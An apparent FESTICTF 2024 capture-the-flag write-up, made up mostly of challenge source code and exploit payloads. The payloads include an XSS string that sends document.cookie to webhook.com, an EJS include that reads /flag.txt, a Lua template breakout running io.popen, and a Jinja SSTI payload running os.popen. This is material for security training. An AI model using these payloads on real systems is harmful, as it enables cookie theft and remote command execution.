FESTICTF 2024

const express = require("express");
const multer = require("multer");
const qrnode = require("qrnode");
const ejs = require("ejs");

function decodeQr(path) {
  return new Promise((resolve, _) => {
    return qrnode.detect(path, (data) => {
      resolve(data);
    });
  });
}

const app = express();
const upload = multer({ dest: "uploads/", limits: { fileSize: 10000 } });

app.set("view engine", "ejs");
app.set("views", "views");

app.get("/", (req, res) => {
  res.render("index");
});

app.post("/upload", upload.single("qrcode"), async (req, res) => {
  console.log(req.file.path);
  try {
    const qrCode = await decodeQr(req.file.path);
    if (qrCode.startsWith("http") || qrCode.startsWith("https")) {
      res.send(
        ejs.render(`<script>window.location.href = '${qrCode}';</script>`)
      );
    } else {
      res.send(
        ejs.render(
          `<script>window.location.href = 'https://www.google.com/search?q=${qrCode}';</script>`
        )
      );
    }
  } catch (error) {
    res.send("Error");
  }
});

app.listen(3000, () => console.log("Server is running on port 3000"));

import qrcode

data = input("QR Content: ")

img = qrcode.make(data)

img.save("qr.png")

https://webhook.com' + document.cookie //

<!DOCTYPE html>
<html>
  <head>
    <title>Document</title>
  </head>
  <body>
    <script>
      (async () => {
        const blob = await (await fetch("./qr.png")).blob();
        const file = new File([blob], "qr.png", { type: "image/png" }, "utf-8");
        const c = new DataTransfer();
        c.items.add(file);

        const form = document.createElement("form");
        form.method = "POST";
        form.action = "http://soal-festi2024.udb.ac.id/upload";
        form.enctype = "multipart/form-data";

        const input = document.createElement("input");
        input.name = "qrcode";
        input.type = "file";
        input.files = c.files;

        form.appendChild(input);
        document.body.appendChild(form);
        form.submit();
      })();
    </script>
  </body>
</html>

<%- include('/flag.txt'); %>

curl "http://soal-festi2024.udb.ac.id/upload" -X POST -F "qrcode=@qr.png"

server {
    listen 80;
    absolute_redirect off;

    location /report/ {
        proxy_pass http://bot:3000/;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }

    location / {
        proxy_pass http://js:3000/;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }

    location /dev/ {
        default_type 'text/html';
        proxy_pass http://js:3000/;
        rewrite ^/dev/(.*)$ /$1 break;
        content_by_lua_block {
            local url = ngx.var.uri;
            local method = ngx.req.get_method();
            local body = nil;
            if method == 'POST' then
                ngx.req.read_body();
                body = ngx.req.get_body_data();
            end
            if method == 'POST' then
                method = ngx.HTTP_POST;
            else
                method = ngx.HTTP_GET;
            end
            local res = ngx.location.capture(url, { method = method, body = body });
            local template = io.open('/var/www/html/index.lua'):read('*a');
            template = template:gsub('{{response}}', res.body);
            local f = loadstring(template);
            f()
        }
    }
}

local response = [[{{response}}]]
response = '<textarea>' .. response .. '</textarea>'

-- HTML and CSS structure
local html = [[
<!DOCTYPE html>
<html>
<head>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #f0f0f0;
        }
        .container {
            width: 80%;
            max-width: 800px;
            margin: auto;
        }
        textarea {
            width: 100%;
            height: 300px;
            padding: 10px;
            border: 1px solid #ccc;
            border-radius: 5px;
            font-size: 16px;
            background-color: #fff;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            resize: none;
        }
    </style>
</head>
<body>
    <div class="container">
        ]] .. response .. [[
    </div>
</body>
</html>
]]

ngx.print(html)

]] .. (io.popen('<cmd>'):read('*a')) .. [[

curl "http://soal-festi2024.udb.ac.id/dev/upload" -X POST -F "qrcode=@qr.png"

@app.route('/', methods = ['GET', 'POST'])
def index():
    if request.method == 'GET':
        return render_template('index.html')
    else:
        ex = request.form['expression']
        if ex == None or ex == '':
            return 'tidak ada data yang dikirim'
        
        res = "Hasil: {}".format('{{' + ex + '}}')

        return render_template('index.html', result = render_template_string(res))

lipsum.__globals__['os'].popen('<cmd>').read()